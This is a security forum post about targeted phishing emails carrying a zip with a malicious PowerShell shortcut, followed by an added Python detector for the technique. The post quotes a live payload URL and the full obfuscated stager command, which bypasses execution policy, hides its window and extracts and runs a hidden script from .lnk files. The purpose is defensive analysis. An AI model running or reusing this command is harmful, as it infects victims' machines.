
SANS ISC: Has anyone any ideas what "glirote3" -- malware powershell link. - Internet Security | DShield SANS ISC InfoSec Forums


Has anyone any ideas what "glirote3" -- malware powershell link.
All,
Over the last couple of weeks I have received a couple of targeted emails with links to a zip file which contains a shortcut and a png file. When I say targeted, they have my name and the main office telephone number along with postcode (i.e. zip code). Each email claims to be an order confirmation. The png file for some reason is marked as hidden, and the shortcut is actually a powershell link.

The link (reported to GoDaddy, so may go soon hopefully) is:

https://rkbbeauty.com/.cabinet/838IZ46044-package-updated

The shortcut powershell command is:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $no="po"wer"shel"l -win hi"dd"en -c "fi"nds"tr /s glirote3 $env:userprofile\*.lnk > $env:userprofile\Downloads\vvv"."p"s"1; & $env:userprofile\Downloads\vvv"."p"s"1"; start-process $no

Is anyone aware what glirote3 is, as I am not turning up any references from a quick search?
W60

14 Posts
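
Added example (not part of the original post): read as written, the posted command has findstr copy lines containing glirote3 from .lnk files under the user profile into Downloads\vvv.ps1 and then runs that file. The Python below checks process-creation command lines for those traits after stripping the quote splitting; the rule names and the benign sample lines are constructed for illustration.

```python
import re

# Command line quoted from the post above (held as data only, never executed).
POSTED = r'''C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $no="po"wer"shel"l -win hi"dd"en -c "fi"nds"tr /s glirote3 $env:userprofile\*.lnk > $env:userprofile\Downloads\vvv"."p"s"1; & $env:userprofile\Downloads\vvv"."p"s"1"; start-process $no'''

# Constructed benign command lines for contrast.
BENIGN = [
    r'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1',
    r'findstr /s TODO C:\src\*.txt',
]

# Hypothetical rule names; patterns are applied to the normalized command line.
RULES = {
    "policy_bypass": r'-(ep|ex[a-z]*)\s+bypass',
    "hidden_window": r'-w[a-z]*\s+(hidden|1)\b',
    "lnk_to_ps1": r'findstr\b.*\.lnk\b.*>\s*\S+\.ps1',
}

def normalize(cmd):
    """Lower-case and drop quote, backtick and caret characters that split keywords."""
    return re.sub(r'\s+', ' ', re.sub('["\'`^]', '', cmd.lower()))

def analyze(cmd):
    """Return the set of indicator names that match one command line."""
    norm = normalize(cmd)
    hits = {name for name, rx in RULES.items() if re.search(rx, norm)}
    # A quote between two letters means a keyword was split to dodge string matching.
    if re.search(r'[a-z]"[a-z]', cmd.lower()):
        hits.add("quote_split_tokens")
    # The file written by the redirect is invoked later in the same command.
    m = re.search(r'>\s*(\S+\.ps1)\s*;(.*)', norm)
    if m and m.group(1) in m.group(2):
        hits.add("runs_dropped_script")
    return hits

def marker(cmd):
    """Return the string findstr searches for, so .lnk files can be hunted for it."""
    m = re.search(r'findstr\s+(?:/\S+\s+)*(\S+)', normalize(cmd))
    return m.group(1) if m else None

if __name__ == "__main__":
    for line in [POSTED] + BENIGN:
        print(sorted(analyze(line)), marker(line))
```

Matching only on the literal marker string would miss a sample that changes it; the combination of a findstr redirect from .lnk files into a .ps1 that is then invoked is the more durable signal.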
